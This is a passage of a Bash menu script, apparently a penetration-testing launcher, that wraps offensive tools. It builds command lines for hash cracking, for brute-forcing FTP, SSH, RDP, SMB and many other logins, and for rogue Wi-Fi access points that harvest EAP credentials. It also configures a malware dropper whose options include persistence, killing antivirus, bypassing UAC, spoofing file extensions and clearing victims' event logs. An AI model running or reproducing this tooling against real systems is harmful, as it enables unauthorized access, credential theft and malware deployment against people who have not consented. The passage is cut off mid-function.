1797 then
1798 clear
1799 break
1800 elif [[ "$MITMSET" = "00" ]]
1801 then
1802 clear
1803 exec bash "$0"
1804 elif [[ "$MITMSET" = "0" ]]
1805 then
1806 clear
1807 exit
1808 fi
1809 done
1810elif [[ "$MITMATT" = "back" || "$MITMATT" = "b" ]]
1811then
1812 BACKL="1"
1813 break
1814elif [[ "$MITMATT" = "00" ]]
1815then
1816 clear
1817 exec bash "$0"
1818elif [[ "$MITMATT" = "0" ]]
1819then
1820 clear
1821 exit
1822fi
1823}
1824function dagon_script
1825{
1826while true
1827do
1828 clear
1829 TERMINALTITLE="DAGON"
1830 dash_calc
1831 printf '\033]2;DAGON\a'
1832 if [[ "$HASH" = "" || "$HASH" = "\e[1;31mNONE\e[0m" ]]
1833 then
1834 HASH="\e[1;31mNONE\e[0m"
1835 OK=0
1836 fi
1837 if [[ "$CORV" = "" ]]
1838 then
1839 CORV="crack"
1840 fi
1841 echo -e "-----------------Basic options-----------------"
1842 echo -e ""$YS" 1"$CE") Specify your hash(es) CURRENT:$HASH"
1843 echo -e ""$YS" 2"$CE") Crack/verify CURRENT:$CORV"
1844 if [[ -f /root/lscript/hashlog.txt ]]
1845 then
1846 echo -e ""$YS" 3"$CE") View your last log"
1847 else
1848 echo -e ""$RS" 3"$CE") View your last log"
1849 fi
1850 echo -e "--------------------Optional--------------------"
1851 if [[ "$DICTATTACK" = "" ]]
1852 then
1853 DICTATTACK="OFF"
1854 fi
1855 echo -e ""$YS" 4"$CE") Dictionary attack CURRENT:$DICTATTACK"
1856 if [[ "$DICT" = "" && $DICTATTACK = "OFF" ]]
1857 then
1858 DICT="OFF"
1859 elif [[ "$DICT" = "\e[1;31mNONE\e[0m" && $DICTATTACK = "OFF" ]]
1860 then
1861 DICT="OFF"
1862 elif [[ "$DICT" = "OFF" && $DICTATTACK = "ON" ]]
1863 then
1864 DICT="\e[1;31mNONE\e[0m"
1865 elif [[ "$DICT" = "" && $DICTATTACK = "ON" ]]
1866 then
1867 DICT="\e[1;31mNONE\e[0m"
1868 fi
1869 if [[ "$DICTTYPE" = 1 ]]
1870 then
1871 DICT="$DICTPATH"
1872 elif [[ "$DICTTYPE" = 2 ]]
1873 then
1874 DICT="multiple"
1875 elif [[ "$DICTTYPE" = 3 ]]
1876 then
1877 DICT="$DICTPATH folder"
1878 fi
1879 echo -e " "$YS"5"$CE") Specify dictionary/ies CURRENT:$DICT"
1880 echo -e "------------------------------------------------"
1881 echo -e ""$YS" b"$CE") Go back "$YS"update"$CE") Update dagon"
1882 echo -e ""$YS"start"$CE") Start"
1883 echo -e "Choose: "
1884 read DAGON
1885 clear
1886 if [[ "$DAGON" = "back" || "$DAGON" = "b" ]]
1887 then
1888 break
1889 elif [[ "$DAGON" = "4" ]]
1890 then
1891 if [[ "$DICTATTACK" = "OFF" ]]
1892 then
1893 DICTATTACK="ON"
1894 else
1895 DICTATTACK="OFF"
1896 fi
1897 elif [[ "$DAGON" = "update" ]]
1898 then
1899 cd /root/dagon
1900 python dagon.py --update
1901 sleep 3
1902 elif [[ "$DAGON" = "start" ]]
1903 then
1904 if [[ "$HASH" = "" || "$HASH" = "\e[1;31mNONE\e[0m" ]]
1905 then
1906 echo -e ""$RS"No hash selected."$CE""
1907 sleep 3
1908 fi
1909 if [[ "$DICTATTACK" = "ON" && $DICT = "\e[1;31mNONE\e[0m" ]]
1910 then
1911 echo -e ""$RS"No dictionary selected, but dictionary option is enabled"$CE""
1912 sleep 5
1913 continue
1914 fi
1915 cd /root/dagon
1916 if [[ "$HASHTYPE" = 1 ]]
1917 then
1918 if [[ "$CORV" = "crack" ]]
1919 then
1920 HASHCOMMAND="python dagon.py -c "$HASH" --bruteforce"
1921 else
1922 HASHCOMMAND="python dagon.py -v "$HASH""
1923 fi
1924 elif [[ "$HASHTYPE" = 2 || "$HASHTYPE" = 3 ]]
1925 then
1926 if [[ "$CORV" = "crack" ]]
1927 then
1928 HASHCOMMAND="python dagon.py -l "$HASH" --bruteforce"
1929 else
1930 HASHCOMMAND="python dagon.py -V "$HASH""
1931 fi
1932 fi
1933 if [[ "$DICTATTACK" = "ON" ]]
1934 then
1935 if [[ "$DICTTYPE" = 1 ]]
1936 then
1937 DICTCOMMAND="-w $DICTPATH"
1938 elif [[ "$DICTTYPE" = 2 ]]
1939 then
1940 DICTCOMMAND="-W $DICTPATH"
1941 elif [[ "$DICTTYPE" = 3 ]]
1942 then
1943 DICTCOMMAND="-D $DICTPATH"
1944 fi
1945 else
1946 DICTCOMMAND=""
1947 fi
1948
1949 $HASHCOMMAND $DICTCOMMAND | tee "$LPATH/hashlog.txt"
1950 echo -e "$PAKTGB"
1951 $READAK
1952 elif [[ "$DAGON" = 5 ]]
1953 then
1954 echo -e ""$YS" 1"$CE") Select one disctionary"
1955 echo -e ""$YS" 2"$CE") Select multiple disctionaries"
1956 echo -e ""$YS" 3"$CE") Select a folder with disctionaries"
1957 echo -e ""$YS" b"$CE") Go back"
1958 echo -e "Choose: "
1959 read DICTSEL
1960 clear
1961 if [[ "$DICTSEL" = 1 ]]
1962 then
1963 echo -e "Type the path of the dictionary:"
1964 read DICTPATH
1965 if [[ ! -f "$DICTPATH" ]]
1966 then
1967 echo -e ""$RS"No such file"$CE""
1968 sleep 2
1969 continue
1970 fi
1971 DICTTYPE=1
1972 elif [[ "$DICTSEL" = 2 ]]
1973 then
1974 echo -e "Type the path of the first dictionary:"
1975 read DICTPATH
1976 if [[ ! -f "$DICTPATH" ]]
1977 then
1978 echo -e ""$RS"No such file"$CE""
1979 sleep 2
1980 continue
1981 fi
1982 while true
1983 do
1984 clear
1985 echo -e ""$RS"----------TO STOP, TYPE 0----------"
1986 echo -e "Type the path of the next dictionary: "
1987 read DICTNEXT
1988 if [[ "$DICTNEXT" = "0" || "$DICTNEXT" = "o" || "$DICTNEXT" = "O" ]]
1989 then
1990 DICTTYPE=2
1991 break
1992 fi
1993 if [[ ! -f "$DICTNEXT" ]]
1994 then
1995 echo -e ""$RS"No such file"$CE""
1996 sleep 2
1997 continue
1998 fi
1999 DICTPATH=""$DICTPATH","$DICTNEXT""
2000 done
2001 elif [[ "$DICTSEL" = 3 ]]
2002 then
2003 echo -e "Type the path of the folder:"
2004 read DICTPATH
2005 if [[ ! -d "$DICTPATH" ]]
2006 then
2007 echo -e ""$RS"No such folder"$CE""
2008 sleep 2
2009 continue
2010 fi
2011 DICTTYPE=3
2012 elif [[ "$DICTSEL" = "back" || "$DICTSEL" = "b" ]]
2013 then
2014 continue
2015 fi
2016 elif [[ "$DAGON" = 3 ]]
2017 then
2018 if [[ ! -f /root/lscript/hashlog.txt ]]
2019 then
2020 echo -e ""$RS"No log found."$CE""
2021 sleep 2
2022 else
2023 cat /root/lscript/hashlog.txt
2024 echo -e "$PAKTGB"
2025 $READAK
2026 fi
2027 elif [[ "$DAGON" = 1 ]]
2028 then
2029 clear
2030 echo -e ""$YS" 1"$CE") Type a hash"
2031 echo -e ""$YS" 2"$CE") Type multiple hashes"
2032 echo -e ""$YS" 3"$CE") Select a file with hashes"
2033 echo -e ""$YS" b"$CE") Go back"
2034 echo -e "Choose: "
2035 read HASHES
2036 clear
2037 if [[ "$HASHES" = "back" || "$HASHES" = "b" ]]
2038 then
2039 continue
2040 elif [[ "$HASHES" = 1 ]]
2041 then
2042 echo -e "Type your hash: "
2043 read HASH
2044 HASHTYPE=1
2045 elif [[ "$HASHES" = 2 ]]
2046 then
2047 echo -e "Type your first hash: "
2048 read HASH
2049 echo -e "$HASH" > $LPATH/hashes.txt
2050 while true
2051 do
2052 clear
2053 echo -e ""$RS"----------TO STOP, TYPE 0----------"
2054 echo -e "Type your next hash: "
2055 read HASH
2056 if [[ "$HASH" = "0" || "$HASH" = "o" || "$HASH" = "O" ]]
2057 then
2058 HASH="multiple"
2059 break
2060 fi
2061 echo -e "$HASH" >> $LPATH/hashes.txt
2062 done
2063 HASHTYPE=2
2064 elif [[ "$HASHES" = 3 ]]
2065 then
2066 echo -e "Type the full path of the file: "
2067 read HASHPATH
2068 if [[ ! -f "$HASHPATH" ]]
2069 then
2070 echo -e ""$RS"There is not such file."$CE""
2071 sleep 3
2072 else
2073 HASH="$HASHPATH"
2074 fi
2075 HASHTYPE=3
2076 fi
2077 elif [[ "$DAGON" = 00 ]]
2078 then
2079 exec bash $0
2080 elif [[ "$DAGON" = 0 ]]
2081 then
2082 clear
2083 exit
2084 elif [[ "$DAGON" = 2 ]]
2085 then
2086 if [[ "$CORV" = "crack" ]]
2087 then
2088 CORV="verify"
2089 else
2090 CORV="crack"
2091 fi
2092 fi
2093done
2094}
2095function patator_automation
2096{
2097while true
2098do
2099 clear
2100 echo -e ""$BS"Modes"$CE":"
2101 pttr=$(cat <<EOF
2102$YS 1$CE) ftp_login : Brute-force FTP
2103$YS 2$CE) ssh_login : Brute-force SSH
2104$YS 3$CE) telnet_login : Brute-force Telnet
2105$YS 4$CE) smtp_login : Brute-force SMTP
2106$YS 5$CE) smtp_vrfy : Enumerate valid users using the SMTP VRFY command
2107$YS 6$CE) smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
2108$YS 7$CE) finger_lookup : Enumerate valid users using Finger
2109$YS 8$CE) http_fuzz : Brute-force HTTP/HTTPS
2110$YS 9$CE) ajp_fuzz : Brute-force AJP
2111$YS 10$CE) pop_login : Brute-force POP
2112$YS 11$CE) pop_passd : Brute-force poppassd (not POP3)
2113$YS 12$CE) imap_login : Brute-force IMAP
2114$YS 13$CE) ldap_login : Brute-force LDAP
2115$YS 14$CE) smb_login : Brute-force SMB
2116$YS 15$CE) smb_lookupsid : Brute-force SMB SID-lookup
2117$YS 16$CE) rlogin_login : Brute-force rlogin
2118$YS 17$CE) vmauthd_login : Brute-force VMware Authentication Daemon
2119$YS 18$CE) mssql_login : Brute-force MSSQL
2120$YS 19$CE) oracle_login : Brute-force Oracle
2121$YS 20$CE) mysql_login : Brute-force MySQL
2122$YS 21$CE) mysql_query : Brute-force MySQL queries
2123$YS 22$CE) rdp_login : Brute-force RDP (NLA)
2124$YS 23$CE) pgsql_login : Brute-force PostgreSQL
2125$YS 24$CE) vnc_login : Brute-force VNC
2126$YS 25$CE) dns_forward : Brute-force DNS
2127$YS 26$CE) dns_reverse : Brute-force DNS (reverse lookup subnets)
2128$YS 27$CE) ike_enum : Enumerate IKE transforms
2129$YS 28$CE) snmp_login : Brute-force SNMPv1/2 and SNMPv3
2130$YS 29$CE) unzip_pass : Brute-force the password of encrypted ZIP files
2131$YS 30$CE) keystore_pass : Brute-force the password of Java keystore files
2132$YS 31$CE) sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
2133$YS 32$CE) umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
2134EOF
2135)
2136 echo -e "$pttr"
2137 echo -e "Choose: "
2138 read PT
2139 if [[ "$PT" = 1 ]]
2140 then
2141 XPT="ftp_login"
2142 elif [[ "$PT" = 2 ]]
2143 then
2144 XPT="ssh_login"
2145 elif [[ "$PT" = 3 ]]
2146 then
2147 XPT="telnet_login"
2148 elif [[ "$PT" = 4 ]]
2149 then
2150 XPT="smtp_login"
2151 elif [[ "$PT" = 5 ]]
2152 then
2153 XPT="smtp_vrfy"
2154 elif [[ "$PT" = 6 ]]
2155 then
2156 XPT="smtp_rcpt"
2157 elif [[ "$PT" = 7 ]]
2158 then
2159 XPT="finger_lookup"
2160 elif [[ "$PT" = 8 ]]
2161 then
2162 XPT="http_fuzz"
2163 elif [[ "$PT" = 9 ]]
2164 then
2165 XPT="ajp_fuzz"
2166 elif [[ "$PT" = 10 ]]
2167 then
2168 XPT="pop_login"
2169 elif [[ "$PT" = 11 ]]
2170 then
2171 XPT="pop_passd"
2172 elif [[ "$PT" = 12 ]]
2173 then
2174 XPT="imap_login"
2175 elif [[ "$PT" = 13 ]]
2176 then
2177 XPT="ldap_login"
2178 elif [[ "$PT" = 14 ]]
2179 then
2180 XPT="smb_login"
2181 elif [[ "$PT" = 15 ]]
2182 then
2183 XPT="smb_lookupsid"
2184 elif [[ "$PT" = 16 ]]
2185 then
2186 XPT="rlogin_login"
2187 elif [[ "$PT" = 17 ]]
2188 then
2189 XPT="vmauthd_login"
2190 elif [[ "$PT" = 18 ]]
2191 then
2192 XPT="mssql_login"
2193 elif [[ "$PT" = 19 ]]
2194 then
2195 XPT="oracle_login"
2196 elif [[ "$PT" = 20 ]]
2197 then
2198 XPT="mysql_login"
2199 elif [[ "$PT" = 21 ]]
2200 then
2201 XPT="mysql_query"
2202 elif [[ "$PT" = 22 ]]
2203 then
2204 XPT="rdp_login"
2205 elif [[ "$PT" = 23 ]]
2206 then
2207 XPT="pgsql_login"
2208 elif [[ "$PT" = 24 ]]
2209 then
2210 XPT="vnc_login"
2211 elif [[ "$PT" = 25 ]]
2212 then
2213 XPT="dns_forward"
2214 elif [[ "$PT" = 26 ]]
2215 then
2216 XPT="dns_reverse"
2217 elif [[ "$PT" = 27 ]]
2218 then
2219 XPT="ike_enum"
2220 elif [[ "$PT" = 28 ]]
2221 then
2222 XPT="snmp_login"
2223 elif [[ "$PT" = 29 ]]
2224 then
2225 XPT="unzip_pass"
2226 elif [[ "$PT" = 30 ]]
2227 then
2228 XPT="keystore_pass"
2229 elif [[ "$PT" = 31 ]]
2230 then
2231 XPT="sqlcipher_pass"
2232 elif [[ "$PT" = 32 ]]
2233 then
2234 XPT="umbraco_crack"
2235 fi
2236 if [[ "$XPT" = "" ]]
2237 then
2238 echo -e ""$RS"Wrong choice"$CE""
2239 sleep 3
2240 continue
2241 else
2242 cd /root/patator
2243 export XTP
2244 xterm -T "INSTRUCTIONS" -hold -e "echo -e "---------------------------------------" && echo -e 'start with: python patator.py $XPT' && echo -e "---------------------------------------" && python patator.py $XPT" & disown
2245 xterm -T "PATATOR" -hold & disown
2246 fi
2247done
2248}
2249function eaphammer_automation
2250{
2251 while true
2252 do
2253 clear
2254 TERMINALTITLE="EAPHAMMER"
2255 dash_calc
2256 printf '\033]2;EAPHAMMER\a'
2257 if [[ "$EAPHIFACE" = "" ]]
2258 then
2259 EAPHIFACE="$WLANN"
2260 fi
2261 if [[ "$EAPHESSID" = "" ]]
2262 then
2263 EAPHESSID=""$RS"NONE"$CE""
2264 OK1=0
2265 elif [[ "$EAPHESSID" != "\e[1;31mNONE\e[0m" ]]
2266 then
2267 OK1=1
2268 fi
2269 if [[ "$EAPHBSSID" = "" ]]
2270 then
2271 EAPHBSSID=""$RS"NONE"$CE""
2272 OK1=0
2273 fi
2274 if [[ "$EAPHCHANNEL" = "" ]]
2275 then
2276 EAPHCHANNEL=""$RS"NONE"$CE""
2277 OK1=0
2278 fi
2279 if [[ "$EAPHWPA" = "" ]]
2280 then
2281 EAPHWPA="2"
2282 fi
2283 if [[ "$EAPHAUTH" = "" ]]
2284 then
2285 EAPHAUTH=""$RS"NONE"$CE""
2286 OK1=0
2287 fi
2288 if [[ "$EAPHCREDS" = "" ]]
2289 then
2290 EAPHCREDS="OFF"
2291 fi
2292 if [[ "$EAPHHOSTILE" = "" ]]
2293 then
2294 EAPHHOSTILE="OFF"
2295 fi
2296 if [[ "$EAPHCAPTIVE" = "" ]]
2297 then
2298 EAPHCAPTIVE="OFF"
2299 fi
2300 if [[ "$EAPHPIVOT" = "" ]]
2301 then
2302 EAPHPIVOT="OFF"
2303 fi
2304 if [[ "$EAPHKARMA" = "" ]]
2305 then
2306 EAPHKARMA="OFF"
2307 fi
2308 if [[ "$EAPHAIRCRACK" = "" ]]
2309 then
2310 EAPHAIRCRACK="OFF"
2311 fi
2312 if [[ "$EAPHINTAUTO" = "" ]]
2313 then
2314 EAPHINTAUTO="OFF"
2315 fi
2316 if [[ "$EAPHAIRCRACK" = "OFF" && "$EAPHINTAUTO" = "OFF" && "$EAPHWORD" = "" ]]
2317 then
2318 EAPHWORD="OFF"
2319 fi
2320 if [[ "$EAPHAIRCRACK" = "OFF" && "$EAPHINTAUTO" = "OFF" && "$EAPHWORD" = "OFF" ]]
2321 then
2322 EAPHWORD="OFF"
2323 fi
2324 OK2=1
2325 if [[ "$EAPHAIRCRACK" != "OFF" ]]
2326 then
2327 if [[ "$EAPHWORD" = "OFF" || "$EAPHWORD" = "\e[1;31mNONE\e[0m" ]]
2328 then
2329 EAPHWORD="\e[1;31mNONE\e[0m"
2330 OK2=0
2331 fi
2332 fi
2333 if [[ "$EAPHINTAUTO" = "ON" || "$EAPHWORD" = "\e[1;31mNONE\e[0m" ]]
2334 then
2335 if [[ "$EAPHWORD" = "OFF" ]]
2336 then
2337 EAPHWORD="\e[1;31mNONE\e[0m"
2338 OK2=0
2339 fi
2340 fi
2341 if [[ "$EAPHINTAUTO" = "OFF" && "$EAPHAIRCRACK" = "OFF" ]]
2342 then
2343 if [[ "$EAPHWORD" = "\e[1;31mNONE\e[0m" ]]
2344 then
2345 EAPHWORD="OFF"
2346 fi
2347 fi
2348 echo -e ""$YS" 1"$CE") Create a new RADIUS cert for your AP"
2349 echo -e ""$YS" 2"$CE") Set your interface for the AP CURRENT: $EAPHIFACE"
2350 echo -e ""$YS" 3"$CE") Specify access point ESSID CURRENT: $EAPHESSID"
2351 echo -e ""$YS" 4"$CE") Specify access point BSSID CURRENT: $EAPHBSSID"
2352 echo -e ""$YS" 5"$CE") Specify access point channel CURRENT: $EAPHCHANNEL"
2353 echo -e ""$YS" 6"$CE") Specify WPA type CURRENT: $EAPHWPA"
2354 echo -e ""$YS" 7"$CE") Specify auth type CURRENT: $EAPHAUTH"
2355 echo -e ""$YS" 8"$CE") Harvest EAP creds CURRENT: $EAPHCREDS"
2356 echo -e ""$YS" 9"$CE") Force clients to connect to hostile portal CURRENT: $EAPHHOSTILE"
2357 echo -e ""$YS"10"$CE") Force clients to connect to captive portal CURRENT: $EAPHCAPTIVE"
2358 echo -e ""$YS"11"$CE") Perform an indirect wireless pivot CURRENT: $EAPHPIVOT"
2359 echo -e ""$YS"12"$CE") Enable karma CURRENT: $EAPHKARMA"
2360 echo -e ""$YS"13"$CE") Use autocrack/add with remote cracking rig CURRENT: $EAPHAIRCRACK"
2361 echo -e ""$YS"14"$CE") Use internal autocrack CURRENT: $EAPHINTAUTO"
2362 echo -e ""$YS"15"$CE") Specify wordlist for autocrack CURRENT: $EAPHWORD"
2363 echo -e ""$YS"start"$CE") Start "
2364 echo -e ""$YS"00"$CE") Main menu"
2365 echo -e ""$YS" back"$CE") Go back"
2366 echo -e "Choose: "
2367 read EAPH
2368 clear
2369 if [[ "$EAPH" = 1 ]]
2370 then
2371 cd /root/eaphammer
2372 ./eaphammer --cert-wizard
2373 elif [[ "$EAPH" = 2 ]]
2374 then
2375 echo -e "Type the interface you want to use: "
2376 read EAPHIFACE
2377 elif [[ "$EAPH" = 3 ]]
2378 then
2379 echo -e "Type the ESSID: "
2380 read EAPHESSID
2381 elif [[ "$EAPH" = 4 ]]
2382 then
2383 echo -e "Type the BSSID: "
2384 read EAPHBSSID
2385 elif [[ "$EAPH" = 5 ]]
2386 then
2387 echo -e "Type the channel: "
2388 read EAPHCHANNEL
2389 elif [[ "$EAPH" = 6 ]]
2390 then
2391 if [[ "$EAPHWPA" = 1 ]]
2392 then
2393 EAPHWPA=2
2394 else
2395 EAPHWPA=1
2396 fi
2397 elif [[ "$EAPH" = 7 ]]
2398 then
2399 echo -e ""$YS" 1"$CE") Open"
2400 echo -e ""$YS" 2"$CE") ttls"
2401 echo -e ""$YS" 3"$CE") peap"
2402 echo -e "Choose: "
2403 read PAUTH
2404 if [[ "$PAUTH" = 1 ]]
2405 then
2406 EAPHAUTH="open"
2407 elif [[ "$PAUTH" = 2 ]]
2408 then
2409 EAPHAUTH="ttls"
2410 elif [[ "$PAUTH" = 3 ]]
2411 then
2412 EAPHAUTH="peap"
2413 fi
2414 elif [[ "$EAPH" = 8 ]]
2415 then
2416 if [[ "$EAPHCREDS" = "OFF" ]]
2417 then
2418 EAPHCREDS="ON"
2419 else
2420 EAPHCREDS="OFF"
2421 fi
2422 elif [[ "$EAPH" = 9 ]]
2423 then
2424 if [[ "$EAPHHOSTILE" = "OFF" ]]
2425 then
2426 EAPHHOSTILE="ON"
2427 else
2428 EAPHHOSTILE="OFF"
2429 fi
2430 elif [[ "$EAPH" = 10 ]]
2431 then
2432 if [[ "$EAPHCAPTIVE" = "OFF" ]]
2433 then
2434 EAPHCAPTIVE="ON"
2435 else
2436 EAPHCAPTIVE="OFF"
2437 fi
2438 elif [[ "$EAPH" = 11 ]]
2439 then
2440 if [[ "$EAPHPIVOT" = "OFF" ]]
2441 then
2442 EAPHPIVOT="ON"
2443 else
2444 EAPHPIVOT="OFF"
2445 fi
2446 elif [[ "$EAPH" = 12 ]]
2447 then
2448 if [[ "$EAPHKARMA" = "OFF" ]]
2449 then
2450 EAPHKARMA="ON"
2451 else
2452 EAPHKARMA="OFF"
2453 fi
2454 elif [[ "$EAPH" = 13 ]]
2455 then
2456 if [[ "$EAPHAIRCRACK" = "OFF" ]]
2457 then
2458 clear
2459 echo -e "Hostname: "
2460 read HOSTN
2461 echo -e "Port: "
2462 read PORT
2463 clear
2464 EAPHAIRCRACK=""$HOSTN":"$PORT""
2465 else
2466 EAPHAIRCRACK="OFF"
2467 fi
2468 elif [[ "$EAPH" = 14 ]]
2469 then
2470 if [[ "$EAPHINTAUTO" = "OFF" ]]
2471 then
2472 EAPHINTAUTO="ON"
2473 else
2474 EAPHINTAUTO="OFF"
2475 fi
2476 elif [[ "$EAPH" = 15 ]]
2477 then
2478 if [[ "$EAPHWORD" != "OFF" && "$EAPHWORD" != "\e[1;31mNONE\e[0m" ]]
2479 then
2480 EAPHWORD="OFF"
2481 else
2482 clear
2483 echo -e "Type the full wordlist path: "
2484 read EAPHWORD
2485 fi
2486 elif [[ "$EAPH" = "back" || "$EAPH" = "b" ]]
2487 then
2488 clear
2489 break
2490 elif [[ "$EAPH" = "00" ]]
2491 then
2492 clear
2493 exec bash $0
2494 elif [[ "$EAPH" = "0" ]]
2495 then
2496 clear
2497 exit
2498 elif [[ "$EAPH" = "start" ]]
2499 then
2500 clear
2501 if [[ "$OK1" != 1 ]]
2502 then
2503 echo -e "You haven't specified the important requirements"
2504 sleep 4
2505 continue
2506 fi
2507 if [[ "$OK2" != 1 ]]
2508 then
2509 echo -e "You haven't specified a wordlist for the autocrack"
2510 sleep 4
2511 continue
2512 fi
2513 if [[ "$EAPHCREDS" = "ON" ]]
2514 then
2515 CREDS="--creds"
2516 else
2517 CREDS=""
2518 fi
2519 if [[ "$EAPHHOSTILE" = "ON" ]]
2520 then
2521 HOSTILE="--hostile-portal"
2522 else
2523 HOSTILE=""
2524 fi
2525 if [[ "$EAPHCAPTIVE" = "ON" ]]
2526 then
2527 CAPTIVE="--captive-portal"
2528 else
2529 CAPTIVE=""
2530 fi
2531 if [[ "$EAPHPIVOT" = "ON" ]]
2532 then
2533 PIVOT="--pivot"
2534 else
2535 PIVOT=""
2536 fi
2537 if [[ "$EAPHKARMA" = "ON" ]]
2538 then
2539 KARMA="--karma"
2540 else
2541 KARMA=""
2542 fi
2543 if [[ "$EAPHINTAUTO" = "ON" ]]
2544 then
2545 INTAUTO="--local-autocrack"
2546 else
2547 INTAUTO=""
2548 fi
2549 if [[ "$EAPHAIRCRACK" != "OFF" ]]
2550 then
2551 AIRCRACK="--remote-autocrack $EAPHAIRCRACK"
2552 else
2553 AIRCRACK=""
2554 fi
2555 if [[ "$EAPHAIRCRACK" != "OFF" || "$EAPHINTAUTO" != "OFF" ]]
2556 then
2557 WORD="--wordlist $EAPHWORD"
2558 else
2559 WORD=""
2560 fi
2561 IFACE="-i $EAPHIFACE"
2562 CHANNEL="-c $EAPHCHANNEL"
2563 ESSID="-e $EAPHESSID"
2564 BSSID="-b $EAPHBSSID"
2565 WPA="--wpa $EAPHWPA"
2566 AUTH="--auth $EAPHAUTH"
2567 cd /root/eaphammer
2568 ./eaphammer $IFACE $CHANNEL $BSSID $ESSID $WPA $AUTH $PIVOT $KARMA $INTAUTO $CAPTIVE $HOSTILE $CREDS $AIRCRACK $WORD
2569
2570 fi
2571 done
2572}
2573function dropit_automation
2574{
2575clear
2576while true
2577do
2578 clear
2579 TERMINALTITLE="Dr0p1t-Framework"
2580 dash_calc
2581 printf '\033]2;Dr0p1t-Framework\a'
2582 if [[ "$MALURL" = "" ]]
2583 then
2584 MALURL="\e[1;31mNONE\e[0m"
2585 fi
2586 if [[ "$STARTUP" = "" ]]
2587 then
2588 STARTUP="OFF"
2589 fi
2590 if [[ "$TASK" = "" ]]
2591 then
2592 TASK="OFF"
2593 fi
2594 if [[ "$LTPUP" = "" ]]
2595 then
2596 LTPUP="OFF"
2597 fi
2598 if [[ "$KILLANT" = "" ]]
2599 then
2600 KILLANT="OFF"
2601 fi
2602 if [[ "$RUNBAT" = "" ]]
2603 then
2604 RUNBAT="OFF"
2605 fi
2606 if [[ "$RUNPOW" = "" ]]
2607 then
2608 RUNPOW="OFF"
2609 fi
2610 if [[ "$RUNVBS" = "" ]]
2611 then
2612 RUNVBS="OFF"
2613 fi
2614 if [[ "$UACASADMIN" = "" ]]
2615 then
2616 UACASADMIN="OFF"
2617 fi
2618 if [[ "$SPOOFEXT" = "" ]]
2619 then
2620 SPOOFEXT="OFF"
2621 fi
2622 if [[ "$ISZIP" = "" ]]
2623 then
2624 ISZIP="OFF"
2625 fi
2626 if [[ "$COMPRESS" = "" ]]
2627 then
2628 COMPRESS="OFF"
2629 fi
2630 if [[ "$DISUAC" = "" ]]
2631 then
2632 DISUAC="OFF"
2633 fi
2634 if [[ "$ICON" = "" ]]
2635 then
2636 ICON="OFF"
2637 fi
2638 if [[ "$EVENT" = "" ]]
2639 then
2640 EVENT="OFF"
2641 fi
2642 if [[ "$COMPILE" = "" ]]
2643 then
2644 COMPILE="OFF"
2645 fi
2646 if [[ "$D32" = "" ]]
2647 then
2648 D32="OFF"
2649 fi
2650 if [[ "$D64" = "" ]]
2651 then
2652 D64="OFF"
2653 fi
2654 if [[ "$BANN" = "" ]]
2655 then
2656 BANN="OFF"
2657 fi
2658 echo -e ""$YS" 1"$CE") Malware URL CURRENT:$MALURL"
2659 echo -e ""$YS" 2"$CE") Malware to startup CURRENT:$STARTUP"
2660 echo -e ""$YS" 3"$CE") Malware to task scheduler CURRENT:$TASK"
2661 echo -e ""$YS" 4"$CE") Add link to powershell user profile CURRENT:$LTPUP"
2662 echo -e ""$YS" 5"$CE") Kill antivirus before malware CURRENT:$KILLANT"
2663 echo -e ""$YS" 6"$CE") Run batch script before malware CURRENT:$RUNBAT"
2664 echo -e ""$YS" 7"$CE") Run powershell script before malware CURRENT:$RUNPOW"
2665 echo -e ""$YS" 8"$CE") Run vbs script before malware CURRENT:$RUNVBS"
2666 echo -e ""$YS" 9"$CE") Bypass UAC and run malware as admin CURRENT:$UACASADMIN"
2667 echo -e ""$YS"10"$CE") Spoof final file to an extension CURRENT:$SPOOFEXT"
2668 echo -e ""$YS"11"$CE") Malware is zip compressed CURRENT:$ISZIP"
2669 echo -e ""$YS"12"$CE") Compress the final file with UPX CURRENT:$COMPRESS"
2670 echo -e ""$YS"13"$CE") Try to disable UAC on victim device CURRENT:$DISUAC"
2671 echo -e ""$YS"14"$CE") Use icon to the final file CURRENT:$ICON"
2672 echo -e ""$YS"15"$CE") Don't clean target's event log CURRENT:$EVENT"
2673 echo -e ""$YS"16"$CE") Don't compile the final file CURRENT:$COMPILE"
2674 echo -e ""$YS"17"$CE") Download malware for 32 bit only CURRENT:$D32"
2675 echo -e ""$YS"18"$CE") Download malware for 64 bit only CURRENT:$D64"
2676 echo -e ""$YS"19"$CE") Stay quite(no banner) CURRENT:$BANN"
2677 echo -e ""$YS" o"$CE") Open output folder"
2678 echo -e ""$YS" u"$CE") Check for updates"
2679 echo -e ""$YS" b"$CE") Go back"
2680 echo -e ""$YS"start"$CE") Generate"
2681 echo -e "Choose: "
2682 read DR
2683 clear
2684 if [[ "$DR" = "o" ]]
2685 then
2686 gio open /root/Dr0p1t-Framework/output
2687 continue
2688 fi
2689 if [[ "$DR" = "u" ]]
2690 then
2691 cd /root/Dr0p1t-Framework
2692 python Dr0p1t.py -u
2693 cd
2694 continue
2695 fi
2696 if [[ "$DR" = "start" ]]
2697 then
2698 if [[ "$MALURL" = "\e[1;31mNONE\e[0m" ]]
2699 then
2700 echo -e ""$RS"No URL specified."$CE""
2701 sleep 2
2702 continue
2703 fi
2704 if [[ "$STARTUP" = "OFF" ]]
2705 then
2706 DSTARTUP=""
2707 else
2708 DSTARTUP="-s"
2709 fi
2710 if [[ "$TASK" = "OFF" ]]
2711 then
2712 DTASK=""
2713 else
2714 DTASK="-t"
2715 fi
2716 if [[ "$LTPUP" = "OFF" ]]
2717 then
2718 DLTPUP=""
2719 else
2720 DLTPUP="-a"
2721 fi
2722 if [[ "$KILLANT" = "OFF" ]]
2723 then
2724 DKILLANT=""
2725 else
2726 DKILLANT="-k"
2727 fi
2728 if [[ "$RUNBAT" = "OFF" ]]
2729 then
2730 DRUNBAT=""
2731 else
2732 DRUNBAT="-b $RUNBAT"
2733 fi
2734 if [[ "$RUNPOW" = "OFF" ]]
2735 then
2736 DRUNPOW=""
2737 else
2738 DRUNPOW="-p $RUNPOW"
2739 fi
2740 if [[ "$RUNVBS" = "OFF" ]]
2741 then
2742 DRUNVBS=""
2743 else
2744 DRUNVBS="-v $RUNVBS"
2745 fi
2746 if [[ "$UACASADMIN" = "OFF" ]]
2747 then
2748 DUACASADMIN=""
2749 else
2750 DUACASADMIN="--runas"
2751 fi
2752 if [[ "$SPOOFEXT" = "OFF" ]]
2753 then
2754 DSPOOFEXT=""
2755 else
2756 DSPOOFEXT="--spoof $SPOOFEXT"
2757 fi
